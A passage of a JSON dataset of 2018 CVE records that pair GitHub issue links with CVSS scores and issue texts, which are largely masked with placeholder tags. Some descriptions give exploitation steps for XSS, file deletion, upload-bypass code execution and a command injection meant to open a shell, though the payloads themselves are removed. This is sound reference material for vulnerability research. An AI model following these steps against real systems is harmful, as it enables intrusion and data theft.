  25175. "Issue_Created_At": "2018-07-26T13:10:42Z",
  25176. "description": "APITAG const , APITAG heap buffer overflow parsing running wasm file causing crash. FILETAG",
  25177. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25178. "severity": "HIGH",
  25179. "baseScore": 8.8,
  25180. "impactScore": 5.9,
  25181. "exploitabilityScore": 2.8
  25182. },
  25183. {
  25184. "CVE_ID": "CVE-2018-16768",
  25185. "Issue_Url_old": "https://github.com/AndrewScheidecker/WAVM/issues/98",
  25186. "Issue_Url_new": "https://github.com/wavm/wavm/issues/98",
  25187. "Repo_new": "wavm/wavm",
  25188. "Issue_Created_At": "2018-07-26T13:11:56Z",
  25189. "description": "APITAG heap buffer overflow parsing running wasm file causing crash. FILETAG",
  25190. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25191. "severity": "HIGH",
  25192. "baseScore": 8.8,
  25193. "impactScore": 5.9,
  25194. "exploitabilityScore": 2.8
  25195. },
  25196. {
  25197. "CVE_ID": "CVE-2018-16769",
  25198. "Issue_Url_old": "https://github.com/AndrewScheidecker/WAVM/issues/99",
  25199. "Issue_Url_new": "https://github.com/wavm/wavm/issues/99",
  25200. "Repo_new": "wavm/wavm",
  25201. "Issue_Created_At": "2018-07-26T13:13:09Z",
  25202. "description": "APITAG parsing running wasm file causing crash in runtime. FILETAG",
  25203. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25204. "severity": "HIGH",
  25205. "baseScore": 8.8,
  25206. "impactScore": 5.9,
  25207. "exploitabilityScore": 2.8
  25208. },
  25209. {
  25210. "CVE_ID": "CVE-2018-16770",
  25211. "Issue_Url_old": "https://github.com/AndrewScheidecker/WAVM/issues/100",
  25212. "Issue_Url_new": "https://github.com/wavm/wavm/issues/100",
  25213. "Repo_new": "wavm/wavm",
  25214. "Issue_Created_At": "2018-07-26T13:13:49Z",
  25215. "description": "APITAG long, void const ) parsing running wasm file causing crash. FILETAG",
  25216. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25217. "severity": "HIGH",
  25218. "baseScore": 8.8,
  25219. "impactScore": 5.9,
  25220. "exploitabilityScore": 2.8
  25221. },
  25222. {
  25223. "CVE_ID": "CVE-2018-16771",
  25224. "Issue_Url_old": "https://github.com/havok89/Hoosk/issues/46",
  25225. "Issue_Url_new": "https://github.com/havok89/hoosk/issues/46",
  25226. "Repo_new": "havok89/hoosk",
  25227. "Issue_Created_At": "2018-08-19T00:58:36Z",
  25228. "description": "Arbitrary code execution on NUMBERTAG When install the Hoosk\uff0cyou can put the code APITAG in the APITAG the APITAG can get the phpinfo page. FILETAG FILETAG",
  25229. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  25230. "severity": "CRITICAL",
  25231. "baseScore": 9.8,
  25232. "impactScore": 5.9,
  25233. "exploitabilityScore": 3.9
  25234. },
  25235. {
  25236. "CVE_ID": "CVE-2018-16772",
  25237. "Issue_Url_old": "https://github.com/havok89/Hoosk/issues/47",
  25238. "Issue_Url_new": "https://github.com/havok89/hoosk/issues/47",
  25239. "Repo_new": "havok89/hoosk",
  25240. "Issue_Created_At": "2018-08-19T06:35:32Z",
  25241. "description": "XSS on Hoosk NUMBERTAG the xss is on the page PATHTAG a text new page, fill the ERRORTAG in the APITAG Title (this is displayed on navigation menus)' field FILETAG FILETAG",
  25242. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  25243. "severity": "MEDIUM",
  25244. "baseScore": 4.8,
  25245. "impactScore": 2.7,
  25246. "exploitabilityScore": 1.7
  25247. },
  25248. {
  25249. "CVE_ID": "CVE-2018-16773",
  25250. "Issue_Url_old": "https://github.com/teameasy/EasyCMS/issues/6",
  25251. "Issue_Url_new": "https://github.com/teameasy/easycms/issues/6",
  25252. "Repo_new": "teameasy/easycms",
  25253. "Issue_Created_At": "2018-08-24T10:00:54Z",
  25254. "description": "There is a XSS with APITAG the POST file is ERRORTAG FILETAG when we fill the payload in it,close APITAG click the submit again,the xss will trigger FILETAG",
  25255. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  25256. "severity": "MEDIUM",
  25257. "baseScore": 4.8,
  25258. "impactScore": 2.7,
  25259. "exploitabilityScore": 1.7
  25260. },
  25261. {
  25262. "CVE_ID": "CVE-2018-16774",
  25263. "Issue_Url_old": "https://github.com/Neeke/HongCMS/issues/6",
  25264. "Issue_Url_new": "https://github.com/neeke/hongcms/issues/6",
  25265. "Repo_new": "neeke/hongcms",
  25266. "Issue_Created_At": "2018-07-31T02:09:30Z",
  25267. "description": "APITAG NUMBERTAG Arbitrary file deletion. APITAG need to access the page \u201c URLTAG \u201d. Then,delete one of the language. Lastly,use the burpsuit to change the file which you want to delete. FILETAG FILETAG FILETAG",
  25268. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  25269. "severity": "HIGH",
  25270. "baseScore": 7.5,
  25271. "impactScore": 3.6,
  25272. "exploitabilityScore": 3.9
  25273. },
  25274. {
  25275. "CVE_ID": "CVE-2018-16775",
  25276. "Issue_Url_old": "https://github.com/VictorAlagwu/CMSsite/issues/3",
  25277. "Issue_Url_new": "https://github.com/victoralagwu/cmssite/issues/3",
  25278. "Repo_new": "victoralagwu/cmssite",
  25279. "Issue_Created_At": "2018-08-22T07:02:19Z",
  25280. "description": "A cross site scripting (XSS) vulnerability storage. Wonderful works of CMS! I find the security issues on the management settings website: A cross site scripting (XSS) vulnerability is stored in the site name field on the \"ADD\" button under the APITAG menu in APITAG No NUMBERTAG allowing remote attackers to inject arbitrary Web scripts or HTML via fine site names via WITYCMS/ADMIN authenticated HTTP requests FILETAG FILETAG You can insert JS code into the input box when you add the APITAG column, and the code will be executed after saving, which will affect the security of your \"cms\" work Oh!! FILETAG When you query data, you should do a good job of filtering keywords.",
  25281. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  25282. "severity": "MEDIUM",
  25283. "baseScore": 4.8,
  25284. "impactScore": 2.7,
  25285. "exploitabilityScore": 1.7
  25286. },
  25287. {
  25288. "CVE_ID": "CVE-2018-16776",
  25289. "Issue_Url_old": "https://github.com/Creatiwity/wityCMS/issues/154",
  25290. "Issue_Url_new": "https://github.com/creatiwity/witycms/issues/154",
  25291. "Repo_new": "creatiwity/witycms",
  25292. "Issue_Created_At": "2018-08-20T09:39:32Z",
  25293. "description": "Persistent XSS on APITAG name' field (config FILETAG If the data is not sanitized upon input, these components are going to return arbitrary web script or HTML that can be rendered by the browser .",
  25294. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  25295. "severity": "MEDIUM",
  25296. "baseScore": 4.8,
  25297. "impactScore": 2.7,
  25298. "exploitabilityScore": 1.7
  25299. },
  25300. {
  25301. "CVE_ID": "CVE-2018-16779",
  25302. "Issue_Url_old": "https://github.com/hukouhome/blogCMS/issues/1",
  25303. "Issue_Url_new": "https://github.com/town-chen/blogcms/issues/1",
  25304. "Repo_new": "town-chen/blogcms",
  25305. "Issue_Created_At": "2018-08-15T13:26:37Z",
  25306. "description": "There is a storage XSS vulnerability in the blog comment interface . Explain: A cross site scripting (XSS) vulnerability in APITAG may allow a remote attacker to inject arbitrary Web scripts through the source editor, which may result in an attacker obtaining cookies from other administrators and logging into a Web site backend account. First, browse the website and click on a blog to comment on it. FILETAG According to the next picture, the comment contains malicious APITAG code. FILETAG Now, use the administrator's identity to login to the website backstage and view the comments. FILETAG The background management interface will pop up the administrator's cookie. FILETAG Influence: Any user leaving a message on a Web site can use it to perform an operation and may cause an administrator to hijack cookies",
  25307. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  25308. "severity": "MEDIUM",
  25309. "baseScore": 6.1,
  25310. "impactScore": 2.7,
  25311. "exploitabilityScore": 2.8
  25312. },
  25313. {
  25314. "CVE_ID": "CVE-2018-16780",
  25315. "Issue_Url_old": "https://github.com/dusaurabh/PHP/issues/1",
  25316. "Issue_Url_new": "https://github.com/dusaurabh/php/issues/1",
  25317. "Repo_new": "dusaurabh/php",
  25318. "Issue_Created_At": "2018-08-12T13:38:10Z",
  25319. "description": "There is a storage XSS vulnerability in the blog comment interface. Explain: A cross site scripting (XSS) vulnerability in APITAG may allow a remote attacker (user) to inject arbitrary Web scripts through the source editor, which will cause the attacker (user) to obtain the cookies of other users and log in to the accounts of other users. First use the account password to log in to the blog. FILETAG When I comment on one of the blogs,I insert malicious code into it. FILETAG The website does not filter characters, and malicious code is directly transmitted to the website management interface. FILETAG When the administrator clicks the Approve option, the malicious code will be executed. FILETAG Now if an ordinary user sees this comment, his cookie will be stolen. FILETAG Impact: This can be used by any user leaving a message on a Web site to perform an operation and may result in hijacking any user's cookie",
  25320. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  25321. "severity": "MEDIUM",
  25322. "baseScore": 5.4,
  25323. "impactScore": 2.7,
  25324. "exploitabilityScore": 2.3
  25325. },
  25326. {
  25327. "CVE_ID": "CVE-2018-16781",
  25328. "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/6",
  25329. "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/6",
  25330. "Repo_new": "rockcarry/ffjpeg",
  25331. "Issue_Created_At": "2018-08-21T08:28:26Z",
  25332. "description": "APITAG Support && FPE on unknown address. Now this project can only build on MS Windows with gcc/clang, I can't build it. So I write a FILETAG FILETAG to compile it on Linux. But when I run the binary I got this: ERRORTAG",
  25333. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  25334. "severity": "MEDIUM",
  25335. "baseScore": 6.5,
  25336. "impactScore": 3.6,
  25337. "exploitabilityScore": 2.8
  25338. },
  25339. {
  25340. "CVE_ID": "CVE-2018-16782",
  25341. "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/35",
  25342. "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/35",
  25343. "Repo_new": "jsummers/imageworsener",
  25344. "Issue_Created_At": "2018-09-06T07:56:06Z",
  25345. "description": "stack buffer overflow. /my/imageworsener ./imagew w NUMBERTAG FILETAG FILETAG FILETAG \u2192 out.bmp APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffd NUMBERTAG acb5f at pc NUMBERTAG d2dc bp NUMBERTAG ffd NUMBERTAG ac NUMBERTAG sp NUMBERTAG ffd NUMBERTAG ac NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG ffd NUMBERTAG acb5f thread T NUMBERTAG d2db ( PATHTAG NUMBERTAG f ( PATHTAG NUMBERTAG b1db8 ( PATHTAG NUMBERTAG e ( PATHTAG NUMBERTAG f1f NUMBERTAG c1fb NUMBERTAG PATHTAG NUMBERTAG b8b9 ( PATHTAG ) Address NUMBERTAG ffd NUMBERTAG acb5f is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG a9b1f ( PATHTAG ) This frame has NUMBERTAG object(s): FILETAG",
  25346. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25347. "severity": "HIGH",
  25348. "baseScore": 8.8,
  25349. "impactScore": 5.9,
  25350. "exploitabilityScore": 2.8
  25351. },
  25352. {
  25353. "CVE_ID": "CVE-2018-16784",
  25354. "Issue_Url_old": "https://github.com/ky-j/dedecms/issues/3",
  25355. "Issue_Url_new": "https://github.com/ky-j/dedecms/issues/3",
  25356. "Repo_new": "ky-j/dedecms",
  25357. "Issue_Created_At": "2018-09-11T08:41:11Z",
  25358. "description": "XML injection vulnerability exists in the file of APITAG NUMBERTAG SP2 version, which can be utilized by attackers to upload script file to obtain webshell. . Description: XML injection vulnerability exists in the file of APITAG NUMBERTAG SP2 version, which can be utilized by attackers to upload script file to obtain webshell. FILETAG any problem, mailto: root APITAG",
  25359. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  25360. "severity": "HIGH",
  25361. "baseScore": 7.2,
  25362. "impactScore": 5.9,
  25363. "exploitabilityScore": 1.2
  25364. },
  25365. {
  25366. "CVE_ID": "CVE-2018-16785",
  25367. "Issue_Url_old": "https://github.com/ky-j/dedecms/issues/4",
  25368. "Issue_Url_new": "https://github.com/ky-j/dedecms/issues/4",
  25369. "Repo_new": "ky-j/dedecms",
  25370. "Issue_Created_At": "2018-09-11T08:49:57Z",
  25371. "description": "File writing vulnerability exists in the file of APITAG NUMBERTAG SP2 version, which can be utilized by attackers to upload script file to obtain webshell. . Description: File writing vulnerability exists in the file of APITAG NUMBERTAG SP2 version, which can be utilized by attackers to create script file to obtain webshell. FILETAG",
  25372. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  25373. "severity": "HIGH",
  25374. "baseScore": 8.8,
  25375. "impactScore": 5.9,
  25376. "exploitabilityScore": 2.8
  25377. },
  25378. {
  25379. "CVE_ID": "CVE-2018-16805",
  25380. "Issue_Url_old": "https://github.com/b3log/solo/issues/12501",
  25381. "Issue_Url_new": "https://github.com/b3log/solo/issues/12501",
  25382. "Repo_new": "b3log/solo",
  25383. "Issue_Created_At": "2018-09-10T07:38:25Z",
  25384. "description": "\u540e\u53f0\u8fde\u63a5\u7ba1\u7406\u5b58\u5728xss . A cross site scripting (XSS) vulnerability found in the Input page under the APITAG Articles\" menu in b3log NUMBERTAG with an ID of APITAG stored in the \"link\" JSON field allows remote attackers to inject arbitrary Web scripts or HTML via a carefully crafted site name via a APITAG authenticated HTTP request. playload\uff1a FILETAG \u201c APITAG APITAG alert NUMBERTAG APITAG POST PATHTAG HTTP NUMBERTAG Host: localhost NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: / Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: FILETAG Content Type: application/x www form urlencoded; charset=UTF NUMBERTAG Requested With: APITAG Content Length NUMBERTAG Cookie: APITAG b3log APITAG skin=\"\"; APITAG APITAG Connection: close APITAG URLTAG APITAG APITAG FILETAG FILETAG FILETAG FILETAG",
  25385. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  25386. "severity": "MEDIUM",
  25387. "baseScore": 4.8,
  25388. "impactScore": 2.7,
  25389. "exploitabilityScore": 1.7
  25390. },
  25391. {
  25392. "CVE_ID": "CVE-2018-16808",
  25393. "Issue_Url_old": "https://github.com/Dolibarr/dolibarr/issues/9449",
  25394. "Issue_Url_new": "https://github.com/dolibarr/dolibarr/issues/9449",
  25395. "Repo_new": "dolibarr/dolibarr",
  25396. "Issue_Created_At": "2018-09-09T15:38:30Z",
  25397. "description": "APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Payload explanation: We escape from the current td or textarea entity to inject an object entity. We also need to create another td or textarea element since there is a APITAG or APITAG to be associated with. The base NUMBERTAG APITAG stands for APITAG There are some filters used to block XSS like onload, onerror, etc. So using base NUMBERTAG still do the job, it is an example of many NUMBERTAG RISK ======== If exploited, that vulnerability can allow to steal an user session, even the super admin one is the super admin is designed as a validator of that billing. It can also used to make the users do unwilling actions on the application, exfiltrate private data to an unknown destination, etc NUMBERTAG SOLUTION =========== Sanitized properly the query before processing the request. Don't rely on blacklist to protect the application. It is recommended to use htmlentities($parameter, ENT_QUOTE | ENT_HTML5, \"UTF NUMBERTAG true NUMBERTAG REPORT TIMELINE NUMBERTAG Discovery of the vulnerability NUMBERTAG Explanation of the vulnerability NUMBERTAG Determine all of the versions vulnerable to the exploit NUMBERTAG Send full vulnerability details to the Dolibarr's developpers",
  25398. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  25399. "severity": "MEDIUM",
  25400. "baseScore": 6.1,
  25401. "impactScore": 2.7,
  25402. "exploitabilityScore": 2.8
  25403. },
  25404. {
  25405. "CVE_ID": "CVE-2018-16819",
  25406. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/456",
  25407. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/456",
  25408. "Repo_new": "monstra-cms/monstra",
  25409. "Issue_Created_At": "2018-08-29T14:51:26Z",
  25410. "description": "any file delete. Vulnerable URL\uff1a URLTAG touch FILETAG in PATHTAG visit url\uff1a URLTAG the FILETAG will delete APITAG",
  25411. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N",
  25412. "severity": "MEDIUM",
  25413. "baseScore": 4.9,
  25414. "impactScore": 3.6,
  25415. "exploitabilityScore": 1.2
  25416. },
  25417. {
  25418. "CVE_ID": "CVE-2018-16820",
  25419. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/457",
  25420. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/457",
  25421. "Repo_new": "monstra-cms/monstra",
  25422. "Issue_Created_At": "2018-08-29T15:35:37Z",
  25423. "description": "directory traversal in in Monstra dev. visit\uff1a FILETAG can traversal any directory example\uff1a APITAG request\uff1a CODETAG response\uff1a APITAG",
  25424. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  25425. "severity": "HIGH",
  25426. "baseScore": 7.5,
  25427. "impactScore": 3.6,
  25428. "exploitabilityScore": 3.9
  25429. },
  25430. {
  25431. "CVE_ID": "CVE-2018-16831",
  25432. "Issue_Url_old": "https://github.com/smarty-php/smarty/issues/486",
  25433. "Issue_Url_new": "https://github.com/smarty-php/smarty/issues/486",
  25434. "Repo_new": "smarty-php/smarty",
  25435. "Issue_Created_At": "2018-09-05T09:49:07Z",
  25436. "description": "even you enable secrity .trusted_dir can be bypassed. if you enable secrity .$trusted_dir is an array of all directories that are considered trusted. Trusted directories are where you keep php scripts that are executed directly from the templates . the attackers can use ../ to bypass the dir ,if they can editing the templates, they read any file they want. just use {include PATHTAG",
  25437. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  25438. "severity": "MEDIUM",
  25439. "baseScore": 5.9,
  25440. "impactScore": 3.6,
  25441. "exploitabilityScore": 2.2
  25442. },
  25443. {
  25444. "CVE_ID": "CVE-2018-16832",
  25445. "Issue_Url_old": "https://github.com/ysrc/xunfeng/issues/177",
  25446. "Issue_Url_new": "https://github.com/ysrc/xunfeng/issues/177",
  25447. "Repo_new": "ysrc/xunfeng",
  25448. "Issue_Created_At": "2018-09-11T12:04:26Z",
  25449. "description": "Found CSRF vulnerability. The APITAG measures have some defects and attacker can bypass it with Flash, by adding APITAG header. After the administrator logged in, open the following page: malicious payload could be injected into the configuration: APITAG Flash source: ERRORTAG The reason for the vulnerability is in PATHTAG line NUMBERTAG the APITAG can be overwrite by APITAG , which is the default behavior of werkzeug wsgi.",
  25450. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  25451. "severity": "MEDIUM",
  25452. "baseScore": 6.5,
  25453. "impactScore": 3.6,
  25454. "exploitabilityScore": 2.8
  25455. },
  25456. {
  25457. "CVE_ID": "CVE-2018-16951",
  25458. "Issue_Url_old": "https://github.com/ysrc/xunfeng/issues/176",
  25459. "Issue_Url_new": "https://github.com/ysrc/xunfeng/issues/176",
  25460. "Repo_new": "ysrc/xunfeng",
  25461. "Issue_Created_At": "2018-09-11T07:48:59Z",
  25462. "description": "Found command injection vulnerability. An attacker can execute arbitrary commands on the xunfeng server after login, the default account is ERRORTAG . Use the following python function the generate the payload for bouncing a command shell, paste it to APITAG > APITAG > APITAG > APITAG and set scan mode to APITAG (change APITAG may shorten the waiting time). CODETAG The reason for the vulnerability is in APITAG line NUMBERTAG which miss to translate the backquote symbol APITAG `. Demo: URLTAG URLTAG Exploit: URLTAG URLTAG",
  25463. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
  25464. "severity": "HIGH",
  25465. "baseScore": 8.0,
  25466. "impactScore": 5.9,
  25467. "exploitabilityScore": 2.1
  25468. },
  25469. {
  25470. "CVE_ID": "CVE-2018-16974",
  25471. "Issue_Url_old": "https://github.com/jbroadway/elefant/issues/287",
  25472. "Issue_Url_new": "https://github.com/jbroadway/elefant/issues/287",
  25473. "Repo_new": "jbroadway/elefant",
  25474. "Issue_Created_At": "2018-08-29T11:47:42Z",
  25475. "description": "A PHP Code Execution Vulnerability in PATHTAG at NUMBERTAG I found a php code execution vulnerability in PATHTAG at NUMBERTAG FILETAG Sep NUMBERTAG delete APITAG use delete file api to delete .htaccess POST PATHTAG NUMBERTAG php file upload by pass Use the Windows feature to add spaces after the file name. POC: delete .htaccess success APITAG upload php file success APITAG php code execution APITAG APITAG white list author by:xijun. EMAILTAG .cn",
  25476. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  25477. "severity": "CRITICAL",
  25478. "baseScore": 9.8,
  25479. "impactScore": 5.9,
  25480. "exploitabilityScore": 3.9
  25481. },
  25482. {
  25483. "CVE_ID": "CVE-2018-16975",
  25484. "Issue_Url_old": "https://github.com/jbroadway/elefant/issues/286",
  25485. "Issue_Url_new": "https://github.com/jbroadway/elefant/issues/286",
  25486. "Repo_new": "jbroadway/elefant",
  25487. "Issue_Created_At": "2018-08-29T08:52:05Z",
  25488. "description": "A PHP Code Execution Vulnerability in PATHTAG at NUMBERTAG I found a php code execution vulnerability in PATHTAG at NUMBERTAG URL: URLTAG POC NUMBERTAG New Stylesheet Name input a php file extension,like FILETAG NUMBERTAG style input your php code ,like APITAG and you will see the php code execution just like the picture APITAG Suggestion: Stylesheet limit php code author by: xijun. EMAILTAG .cn",
  25489. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  25490. "severity": "CRITICAL",
  25491. "baseScore": 9.8,
  25492. "impactScore": 5.9,
  25493. "exploitabilityScore": 3.9
  25494. },
  25495. {
  25496. "CVE_ID": "CVE-2018-16977",
  25497. "Issue_Url_old": "https://github.com/howchen/howchen/issues/4",
  25498. "Issue_Url_new": "https://github.com/howchen/howchen/issues/4",
  25499. "Repo_new": "howchen/howchen",
  25500. "Issue_Created_At": "2018-09-07T06:38:40Z",
  25501. "description": "Monstra CMS NUMBERTAG allows attachers obtain sensitive information. visit url: ERRORTAG the response error message obtains sensitive information ERRORTAG",
  25502. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  25503. "severity": "MEDIUM",
  25504. "baseScore": 5.3,
  25505. "impactScore": 1.4,
  25506. "exploitabilityScore": 3.9
  25507. },
  25508. {
  25509. "CVE_ID": "CVE-2018-16980",
  25510. "Issue_Url_old": "https://github.com/dotCMS/core/issues/15274",
  25511. "Issue_Url_new": "https://github.com/dotcms/core/issues/15274",
  25512. "Repo_new": "dotcms/core",
  25513. "Issue_Created_At": "2018-09-12T10:28:46Z",
  25514. "description": "xss in APITAG Current Behavior dotcms NUMBERTAG exists xss in PATHTAG parameter APITAG and \"inode\" Steps to Reproduce (for bugs) just visite the url: APITAG FILETAG How to fix: URLTAG",
  25515. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  25516. "severity": "MEDIUM",
  25517. "baseScore": 6.1,
  25518. "impactScore": 2.7,
  25519. "exploitabilityScore": 2.8
  25520. },
  25521. {
  25522. "CVE_ID": "CVE-2018-16981",
  25523. "Issue_Url_old": "https://github.com/nothings/stb/issues/656",
  25524. "Issue_Url_new": "https://github.com/nothings/stb/issues/656",
  25525. "Repo_new": "nothings/stb",
  25526. "Issue_Created_At": "2018-09-12T02:48:26Z",
  25527. "description": "heap buffer overflow in stbi__out_gif_code. Using the following code we are able to trigger a heap buffer overflow on the attached file FILETAG . ERRORTAG Command line: ERRORTAG Output: ERRORTAG",
  25528. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25529. "severity": "HIGH",
  25530. "baseScore": 8.8,
  25531. "impactScore": 5.9,
  25532. "exploitabilityScore": 2.8
  25533. },
  25534. {
  25535. "CVE_ID": "CVE-2018-16982",
  25536. "Issue_Url_old": "https://github.com/BYVoid/OpenCC/issues/303",
  25537. "Issue_Url_new": "https://github.com/byvoid/opencc/issues/303",
  25538. "Repo_new": "byvoid/opencc",
  25539. "Issue_Created_At": "2018-09-13T00:30:49Z",
  25540. "description": "Denial of Service in APITAG Hi, I am a security fan. And I found an out of bound pointer in APITAG which could lead to segment fault APITAG of Service if some applications use this library). In APITAG there are two offset which are APITAG and APITAG So if I provide a .ocd file that I can control these two offsets, I can actually make it really big. So the pointers(const char key and const char value) will point to unreadable place. I've attached the POCs for these two pointers. Hope you can respond soon :) FILETAG",
  25541. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  25542. "severity": "MEDIUM",
  25543. "baseScore": 5.5,
  25544. "impactScore": 3.6,
  25545. "exploitabilityScore": 1.8
  25546. },
  25547. {
  25548. "CVE_ID": "CVE-2018-16985",
  25549. "Issue_Url_old": "https://github.com/inikep/lizard/issues/18",
  25550. "Issue_Url_new": "https://github.com/inikep/lizard/issues/18",
  25551. "Repo_new": "inikep/lizard",
  25552. "Issue_Created_At": "2018-09-07T07:34:35Z",
  25553. "description": "NULL pointer dereference in lz NUMBERTAG lz5_compress). Hello. I found a NULL pointer dereference in LZ NUMBERTAG Please confirm. Thanks. Summary OS: ubuntu NUMBERTAG bit version: Lz NUMBERTAG POC Download: Lz5 poc null pointer dereference URLTAG test code: APITAG with APITAG details: ERRORTAG It may cause a crash or denial of service.",
  25554. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  25555. "severity": "HIGH",
  25556. "baseScore": 7.5,
  25557. "impactScore": 3.6,
  25558. "exploitabilityScore": 3.9
  25559. },
  25560. {
  25561. "CVE_ID": "CVE-2018-17024",
  25562. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/452",
  25563. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/452",
  25564. "Repo_new": "monstra-cms/monstra",
  25565. "Issue_Created_At": "2018-08-16T12:35:58Z",
  25566. "description": "XSS APITAG in Monstra dev. Affected software: Monstra dev Type of vulnerability: XSS APITAG Discovered by: Provensec LLC Website: FILETAG Author: Balvinder Singh Description: Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent or Type I XSS. Proof of concept: Step1: Login into the monstra dev cms. Step2: URL: URLTAG Go to the content and choose pages and then create a new page with malicious javascript. FILETAG Step3: Here as the xss got executed for name parameter in new page. URL: URLTAG FILETAG",
  25567. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  25568. "severity": "MEDIUM",
  25569. "baseScore": 4.8,
  25570. "impactScore": 2.7,
  25571. "exploitabilityScore": 1.7
  25572. },
  25573. {
  25574. "CVE_ID": "CVE-2018-17026",
  25575. "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/25",
  25576. "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/25",
  25577. "Repo_new": "bg5sbk/minicms",
  25578. "Issue_Created_At": "2018-09-12T12:32:56Z",
  25579. "description": "ERRORTAG page have another Stored XSS Vulnerability. Monstra version NUMBERTAG Exploit uri > URLTAG Parameter > page_meta_title POC: POST PATHTAG ERRORTAG HTTP NUMBERTAG Host NUMBERTAG User Agent: Mozilla NUMBERTAG Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: admin_username=admin; APITAG Connection: close Upgrade Insecure Requests NUMBERTAG APITAG ERRORTAG APITAG ERRORTAG +&page_name=error ERRORTAG APITAG ERRORTAG APITAG NUMBERTAG A NUMBERTAG A NUMBERTAG",
  25580. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  25581. "severity": "MEDIUM",
  25582. "baseScore": 4.8,
  25583. "impactScore": 2.7,
  25584. "exploitabilityScore": 1.7
  25585. },
  25586. {
  25587. "CVE_ID": "CVE-2018-17030",
  25588. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/342",
  25589. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/342",
  25590. "Repo_new": "bigtreecms/bigtree-cms",
  25591. "Issue_Created_At": "2018-09-13T01:34:02Z",
  25592. "description": "Authenticated Remote Code Execute. FILE: APITAG APITAG We can set APITAG as APITAG and use the \"\\e\" modifier to execute arbitrary code. poc: FILETAG",
  25593. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
  25594. "severity": "HIGH",
  25595. "baseScore": 7.5,
  25596. "impactScore": 5.9,
